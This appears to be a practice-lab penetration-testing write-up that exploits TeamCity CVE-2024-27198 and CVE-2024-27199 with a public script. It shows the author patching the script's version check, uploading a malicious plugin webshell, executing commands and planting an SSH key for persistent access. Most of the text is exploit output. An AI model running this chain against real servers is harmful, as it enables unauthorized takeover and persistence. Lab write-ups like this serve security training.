Authentication Bypass + RCE
The target TeamCity instance is vulnerable to both CVE-2024-27198 and CVE-2024-27199 due to its outdated version; 2023.05.4 (build 129421)
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ python3 CVE-2024-27198-RCE/CVE-2024-27198-RCE.py --target http://teams.onlyrands.com --domain onlyrands.com --behinder4
_____ ____ _ _ ____ ____ _____
|_ _|__ __ _ _ __ ___ / ___(_) |_ _ _ | _ \ / ___| ____|
| |/ _ \/ _` | '_ ` _ \| | | | __| | | | | |_) | | | _|
| | __/ (_| | | | | | | |___| | |_| |_| | | _ <| |___| |___
|_|\___|\__,_|_| |_| |_|\____|_|\__|\__, | |_| \_\\____|_____|
|___/
Author: @W01fh4cker
Github: https://github.com/W01fh4cker
[+] User added successfully, username: 4p0r4p3m, password: 9wypHKrPTp, user ID: 21
[+] The target operating system version is linux
[+] Please start executing commands freely! Type <quit> to end command execution
command > id
[-] Match failed. Response text:
Responding with error, status code: 400 (Bad Request).
Details: jetbrains.buildServer.server.rest.errors.BadRequestException: This server is not configured to allow process debug launch via "rest.debug.processes.enable" internal property
Invalid request. Please check the request URL and data are correct.Executing the exploit script successfully created an admin account; 4p0r4p3m:9wypHKrPTp
Interestingly, it doesn’t appear to have uploaded the webshell and command fails to execute
Modification
/Practice/Scrutiny/3-Exploitation/attachments/{9FFAB0C8-E966-49F1-A666-868EE0549E24}.png)
Checking back at the source code of the exploit, it was not uploading the webshell because of the line 409, specifying a version, which does not match the target TeamCity instance.
/Practice/Scrutiny/3-Exploitation/attachments/{EC5498BD-72D6-4FC4-B85C-19E84788B3E3}.png)
So I fixed it
Exploitation
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ python3 CVE-2024-27198-RCE/CVE-2024-27198-RCE.py --target http://teams.onlyrands.com --domain onlyrands.com
_____ ____ _ _ ____ ____ _____
|_ _|__ __ _ _ __ ___ / ___(_) |_ _ _ | _ \ / ___| ____|
| |/ _ \/ _` | '_ ` _ \| | | | __| | | | | |_) | | | _|
| | __/ (_| | | | | | | |___| | |_| |_| | | _ <| |___| |___
|_|\___|\__,_|_| |_| |_|\____|_|\__|\__, | |_| \_\\____|_____|
|___/
Author: @W01fh4cker
Github: https://github.com/W01fh4cker
[+] User added successfully, username: drl2qqgm, password: 4gNrmYuT9c, user ID: 25
[+] The target operating system version is linux
[!] The current version is: 2023.05.4 (build 129421). The official has deleted the /app/rest/debug/processes port. You can only upload a malicious plugin to upload webshell and cause RCE.
[!] The program will automatically upload the webshell ofbehinder3.0. You can also specify the file to be uploaded through the parameter -f. Do you wish to continue? (y/n)y
[+] The malicious plugin jF1u7x1R was successfully uploaded and is trying to be activated
[+] Successfully load plugin jF1u7x1R
[+] The malicious plugin jF1u7x1R was successfully activated! Webshell url: http://teams.onlyrands.com/plugins/jF1u7x1R/jF1u7x1R.jsp
[+] Please start executing commands freely! Type <quit> to end command execution
command > id
uid=1015(git) gid=1005(git) groups=1005(git)Code execution confirmed
command > mkdir -p ~/.ssh
command > echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali > ~/.ssh/authorized_keysWriting SSH key
SSH
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh git@onlyrands.com -i ~/.ssh/id_ed25519
The authenticity of host 'onlyrands.com (192.168.219.91)' can't be established.
ED25519 key fingerprint is SHA256:bdEzYRpG4k3NkIr03/E2H6ltJRUD52Zi5YA0fkNr/nY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:170: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'onlyrands.com' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-182-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon 07 Apr 2025 08:06:51 PM UTC
System load: 0.09 Processes: 228
Usage of /: 87.8% of 9.75GB Users logged in: 0
Memory usage: 62% IPv4 address for ens160: 192.168.219.91
Swap usage: 0%
=> / is using 87.8% of 9.75GB
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
git@onlyrands:~$ whoami
git
git@onlyrands:~$ hostname
onlyrands.com
git@onlyrands:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:0d:9e brd ff:ff:ff:ff:ff:ff
inet 192.168.219.91/24 brd 192.168.219.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the git user via exploiting CVE-2024-27198 and CVE-2024-27199